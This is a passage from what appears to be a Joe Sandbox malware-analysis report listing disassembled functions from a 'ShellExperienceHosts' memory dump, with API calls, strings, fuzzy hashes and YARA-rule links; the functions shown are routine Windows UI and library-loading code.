Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
String ID:
API String ID: 1192691108-0
Opcode ID: 8ba1a21b26c346df929e20f7ff3742d5dc1b7e22bf12e0b88c0522db034c44ff
Instruction ID: 2ab5945d597366d338a50b38f111675a0af6faab9ca65c0faaebf9657ca5cc5c
Opcode Fuzzy Hash: 8ba1a21b26c346df929e20f7ff3742d5dc1b7e22bf12e0b88c0522db034c44ff
Instruction Fuzzy Hash: 70212171A00605FBD7109FB5DC88A9BBFBCFF05254B00452AA519D7540D734E411CBA0

Function 6C9D1B94 Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

RealChildWindowFromPoint.USER32(?,?,?), ref: 6C9D1BB8
ClientToScreen.USER32(?,?), ref: 6C9D1BD2
GetWindow.USER32(?,00000005), ref: 6C9D1C24

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$ChildClientFromPointRealScreen
String ID:
API String ID: 2518355518-0
Opcode ID: 96f123e4863827a4bcb6e0e4c7df6f63a8f13f95691470c7ca001d8f208dfba3
Instruction ID: 32c5165bc2d3b6f45598d21be0778ebb62c42ba95734442a0d1d5fd322e823c7
Opcode Fuzzy Hash: 96f123e4863827a4bcb6e0e4c7df6f63a8f13f95691470c7ca001d8f208dfba3
Instruction Fuzzy Hash: F311AF32B01619ABDB11DFA4D848AAF7BFCEF4A310F118125F815F3140EB34EA418BA0

Function 6C9B7FBC Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6C9B7FD9
GetWindowRect.USER32(?,?), ref: 6C9B7FF7
ScreenToClient.USER32(?,?), ref: 6C9B8004
ScreenToClient.USER32(?,?), ref: 6C9B8011
EqualRect.USER32(?,?), ref: 6C9B801C
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 6C9B8043
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 6C9B804D

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 2731dc28d4fedec2e82607e60fd3c2e2be34d55f5a34fbe08c8ab018737478c4
Instruction ID: 889e8782cb259cb5ba4d05eab606f42f237017a239c5bbc20efa4d429676ccd2
Opcode Fuzzy Hash: 2731dc28d4fedec2e82607e60fd3c2e2be34d55f5a34fbe08c8ab018737478c4
Instruction Fuzzy Hash: 6221F975A0120AEFDF11DFA4C984EAEBBB8EF5A704F104159A905AB154D730D941CBA0

Function 6C9B9F2B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 6C9B9F42
FindResourceW.KERNEL32(?,00000000,AFX_DIALOG_LAYOUT), ref: 6C9B9F6A
SizeofResource.KERNEL32(?,00000000), ref: 6C9B9F7C
LoadResource.KERNEL32(?,00000000), ref: 6C9B9F88
LockResource.KERNEL32(00000000), ref: 6C9B9F93

Strings

AFX_DIALOG_LAYOUT, xrefs: 6C9B9F5B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Resource$FindLoadLockSizeofWindow
String ID: AFX_DIALOG_LAYOUT
API String ID: 2582447065-2436846380
Opcode ID: 8f2524ad0fa11559eb6cecb96710653937124552c676551da730cff869c6a478
Instruction ID: 73df6bfd919fbe9b9a9967206ea67bd4c93893f622dc8e3b0b9b490c1fe6ef63
Opcode Fuzzy Hash: 8f2524ad0fa11559eb6cecb96710653937124552c676551da730cff869c6a478
Instruction Fuzzy Hash: DD11CE71611600BFEF114F749C48AAFBABCEF64264B224024B806E3A10EBB4DD50C760

Function 6CA0BCF8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CA0BCFF

Part of subcall function 6C9C28BA: __EH_prolog3.LIBCMT ref: 6C9C28C1

Strings

BLUE_, xrefs: 6CA0BD53
IDX_OFFICE2007_STYLE, xrefs: 6CA0BD0F
BLACK_, xrefs: 6CA0BD4C, 6CA0BD58, 6CA0BD60
SILVER_, xrefs: 6CA0BD3E
AQUA_, xrefs: 6CA0BD45

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: H_prolog3
String ID: AQUA_$BLACK_$BLUE_$IDX_OFFICE2007_STYLE$SILVER_
API String ID: 431132790-2717817858
Opcode ID: cedb71ab9e3f99ef156a43b016f58650a99077fd4a7940fd24fd2dd4a24f70be
Instruction ID: 30edefab8becef51d2c6de1096b5914e4c62308cee9c344b8187f63c915b2e74
Opcode Fuzzy Hash: cedb71ab9e3f99ef156a43b016f58650a99077fd4a7940fd24fd2dd4a24f70be
Instruction Fuzzy Hash: EB11C872A00059E7DB01EBE8E940BFEB775AFA035CF154345E0256BB84CB30DA89DB51

Function 6C9D3EC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 6C9D3ED2
GetProcAddress.KERNEL32(00000000,BeginBufferedPaint), ref: 6C9D3EE2
EncodePointer.KERNEL32(00000000), ref: 6C9D3EEB
DecodePointer.KERNEL32(00000000), ref: 6C9D3EF9

Strings

BeginBufferedPaint, xrefs: 6C9D3EDC
uxtheme.dll, xrefs: 6C9D3ECD

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: BeginBufferedPaint$uxtheme.dll
API String ID: 2061474489-1632326970
Opcode ID: 31ad6031d3687f4fb8ab2465706485c2568bf855076dbd9fb8c983b7c625d322
Instruction ID: ad0985406bd1e6da443507d69125b51298e0c54e4267f61f895fb5910e37f6d4
Opcode Fuzzy Hash: 31ad6031d3687f4fb8ab2465706485c2568bf855076dbd9fb8c983b7c625d322
Instruction Fuzzy Hash: 7BF06D3A70666AAB9F115FB9EC0895E3FBCFF0A7927014021F809E3910D731D8208BA1

Function 6C9D464A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C9CD814,?,?,?,?), ref: 6C9D465C
GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 6C9D466C
EncodePointer.KERNEL32(00000000,?,?,6C9CD814,?,?,?,?), ref: 6C9D4675
DecodePointer.KERNEL32(00000000,?,?,6C9CD814,?,?,?,?), ref: 6C9D4683

Strings

RegisterApplicationRecoveryCallback, xrefs: 6C9D4666
kernel32.dll, xrefs: 6C9D4657

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: RegisterApplicationRecoveryCallback$kernel32.dll
API String ID: 2061474489-202725706
Opcode ID: 556e638da58bddfd24e6452ee89b3af93682ef2034d4ea676ebe972c16ad4739
Instruction ID: b6eff9a0c1b72aed9e4a8dd2770e220bb20ae8bc5360ff398ea0723f7ffda013
Opcode Fuzzy Hash: 556e638da58bddfd24e6452ee89b3af93682ef2034d4ea676ebe972c16ad4739
Instruction Fuzzy Hash: C7F05475701A66AFCF111FA5EC0885E3BBCAF4A755B418521FD0AF3610D731D9108FA4

Function 6C9D47D8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(comctl32.dll), ref: 6C9D47EA
GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 6C9D47FA
EncodePointer.KERNEL32(00000000), ref: 6C9D4803
DecodePointer.KERNEL32(00000000), ref: 6C9D4811

Strings

TaskDialogIndirect, xrefs: 6C9D47F4
comctl32.dll, xrefs: 6C9D47E5

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: TaskDialogIndirect$comctl32.dll
API String ID: 2061474489-2809879075
Opcode ID: 1250041d59fee8728c353d41fc5679e3c3cfe9689a4b07afb0920c55270aa126
Instruction ID: d7ffbf4eb13f8165b7af6d4efccbdfa4dcaf5198168440d95e6a24acbc27bc0d
Opcode Fuzzy Hash: 1250041d59fee8728c353d41fc5679e3c3cfe9689a4b07afb0920c55270aa126
Instruction Fuzzy Hash: 64F030357026A6ABCF111FA4EC0C85D3ABCAF0A7A57018461FC09E3610D730E950DFA0

Function 6C9D470E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 6C9D4720
GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 6C9D4730
EncodePointer.KERNEL32(00000000), ref: 6C9D4739
DecodePointer.KERNEL32(00000000), ref: 6C9D4747

Strings

shell32.dll, xrefs: 6C9D471B
SHCreateItemFromParsingName, xrefs: 6C9D472A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: SHCreateItemFromParsingName$shell32.dll
API String ID: 2061474489-2320870614
Opcode ID: 79af925e5a42564d657863004760b9e3556c4d989dab9e152fea13eb45ca342c
Instruction ID: 4ef27444cb4691b04ca78e6b1da78a34b9bed741adb3000003f0a714d18a4856
Opcode Fuzzy Hash: 79af925e5a42564d657863004760b9e3556c4d989dab9e152fea13eb45ca342c
Instruction Fuzzy Hash: F7F03035701666AB8F216F65EC0885E3ABDBF4BBA57014411FC0DE7610D735E9108FA0

Function 6C9D4773 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 6C9D4785
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C9D4795
EncodePointer.KERNEL32(00000000), ref: 6C9D479E
DecodePointer.KERNEL32(00000000), ref: 6C9D47AC

Strings

shell32.dll, xrefs: 6C9D4780
SHGetKnownFolderPath, xrefs: 6C9D478F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: SHGetKnownFolderPath$shell32.dll
API String ID: 2061474489-2936008475
Opcode ID: 61eaa363712ae7afadb3975c967a59cf882966f735029515f6b9668bfc2576a9
Instruction ID: 1c8ba54cca61ec4d5774b302bd5df0f38b938802044bf84453d9f94f45fb7c98
Opcode Fuzzy Hash: 61eaa363712ae7afadb3975c967a59cf882966f735029515f6b9668bfc2576a9
Instruction Fuzzy Hash: 7DF01D357016AAEB8F115F64EC08D5E3BBCBF0AA55B014425FD0DE3A10DB30E9109EA0

Function 6C9D46AF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C9CD7F8,?,?), ref: 6C9D46C1
GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 6C9D46D1
EncodePointer.KERNEL32(00000000,?,?,6C9CD7F8,?,?), ref: 6C9D46DA
DecodePointer.KERNEL32(00000000,?,?,6C9CD7F8,?,?), ref: 6C9D46E8

Strings

RegisterApplicationRestart, xrefs: 6C9D46CB
kernel32.dll, xrefs: 6C9D46BC

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: RegisterApplicationRestart$kernel32.dll
API String ID: 2061474489-1259503209
Opcode ID: 9c0249b4b04f347f27f6a533b58c04c1c8560a9ef906948ee11c04a066c10e7f
Instruction ID: 752d2f984bd042f319230d6ad16e9a24dc18fbd5f8be7d0da4590a36f1714150
Opcode Fuzzy Hash: 9c0249b4b04f347f27f6a533b58c04c1c8560a9ef906948ee11c04a066c10e7f
Instruction Fuzzy Hash: B2F03735B42666ABCF215F75AC4895D3BBCBF477A57068021FC0EE7600DB30D9008EA4

Function 6C9D4306 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll), ref: 6C9D4318
GetProcAddress.KERNEL32(00000000,EndBufferedPaint), ref: 6C9D4328
EncodePointer.KERNEL32(00000000), ref: 6C9D4331
DecodePointer.KERNEL32(00000000), ref: 6C9D433F

Strings

EndBufferedPaint, xrefs: 6C9D4322
uxtheme.dll, xrefs: 6C9D4313

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: EndBufferedPaint$uxtheme.dll
API String ID: 2061474489-2993015961
Opcode ID: 8baba1e983bd1e883e018e53ecc08d56386bb5bde0a2d4d959a8649a3963ccd8
Instruction ID: 2e0c250da3aec3bb8f1b1dd1c13c9b8aec2a1b49365f5d08d41cb26e883bcad5
Opcode Fuzzy Hash: 8baba1e983bd1e883e018e53ecc08d56386bb5bde0a2d4d959a8649a3963ccd8
Instruction Fuzzy Hash: 4CF0FE357026AAAB9F211B69AD0895D7BBCAF066A57028421FD1DF7A00D730D9008EA0

Function 6C9D3FCF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll), ref: 6C9D3FE1
GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 6C9D3FF1
EncodePointer.KERNEL32(00000000), ref: 6C9D3FFA
DecodePointer.KERNEL32(00000000), ref: 6C9D4008

Strings

ChangeWindowMessageFilter, xrefs: 6C9D3FEB
user32.dll, xrefs: 6C9D3FDC

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 2061474489-2498399450
Opcode ID: 5c5fe8dcf5bcd17efa4864fd4f9ef8a7fdc31c2d168915ff386f8869fffd03cf
Instruction ID: 0de2fd192cd11af704745f3c469b92de195cf5e13e5b970ce826a68945d8917b
Opcode Fuzzy Hash: 5c5fe8dcf5bcd17efa4864fd4f9ef8a7fdc31c2d168915ff386f8869fffd03cf
Instruction Fuzzy Hash: E0F01235B02665EB8F315F75E80895E3ABCEF4A6A57064421FC09E3A41DB30D9008EA0

Function 6C9D3E64 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C9CCFA8,00000000), ref: 6C9D3E76
GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 6C9D3E86
EncodePointer.KERNEL32(00000000,?,?,6C9CCFA8,00000000), ref: 6C9D3E8F
DecodePointer.KERNEL32(00000000,?,?,6C9CCFA8,00000000), ref: 6C9D3E9D

Strings

ApplicationRecoveryInProgress, xrefs: 6C9D3E80
kernel32.dll, xrefs: 6C9D3E71

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: ApplicationRecoveryInProgress$kernel32.dll
API String ID: 2061474489-2899047487
Opcode ID: 89b04110937ea6c2b2c260a09b48368d18c41e897a19b5257c59aa18637138f9
Instruction ID: 51a2ab6385efef898125d733597a7e25564aeddf31b26f7c950a19b4575c4592
Opcode Fuzzy Hash: 89b04110937ea6c2b2c260a09b48368d18c41e897a19b5257c59aa18637138f9
Instruction Fuzzy Hash: 01F08235B42767AB8B212B74A80881F3ABCBF0A6667014021FD0DE3641DB30D9004AB0

Function 6C9D3E0F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C9CCFEB,00000001), ref: 6C9D3E21
GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 6C9D3E31
EncodePointer.KERNEL32(00000000,?,6C9CCFEB,00000001), ref: 6C9D3E3A
DecodePointer.KERNEL32(00000000,?,?,6C9CCFEB,00000001), ref: 6C9D3E48

Strings

ApplicationRecoveryFinished, xrefs: 6C9D3E2B
kernel32.dll, xrefs: 6C9D3E1C

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: ApplicationRecoveryFinished$kernel32.dll
API String ID: 2061474489-1962646049
Opcode ID: 1bca3d6afb4127bf914df32ac37c984f1237f27a2bf76e0c94eb63787368d334
Instruction ID: aee1c2c562f7e3ccc64a155a4a6e906c45f167d72acd8ef49406d545788b0d07
Opcode Fuzzy Hash: 1bca3d6afb4127bf914df32ac37c984f1237f27a2bf76e0c94eb63787368d334
Instruction Fuzzy Hash: 38F0EC357027775B8F121BB5A80895F3BBDBF466A67054521FD0DE3641DB34D9008AF0

Function 6C9D45AD Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(shell32.dll,?,6C9B7DE7,?,?,6C9CF301,000FC000,00000010,00000048,6C9CF4FC,00000000,?), ref: 6C9D45BC
GetProcAddress.KERNEL32(00000000,InitNetworkAddressControl), ref: 6C9D45CC
EncodePointer.KERNEL32(00000000,?,?,6C9CF301,000FC000,00000010,00000048,6C9CF4FC,00000000,?), ref: 6C9D45D5
DecodePointer.KERNEL32(00000000,?,6C9B7DE7,?,?,6C9CF301,000FC000,00000010,00000048,6C9CF4FC,00000000,?), ref: 6C9D45E3

Strings

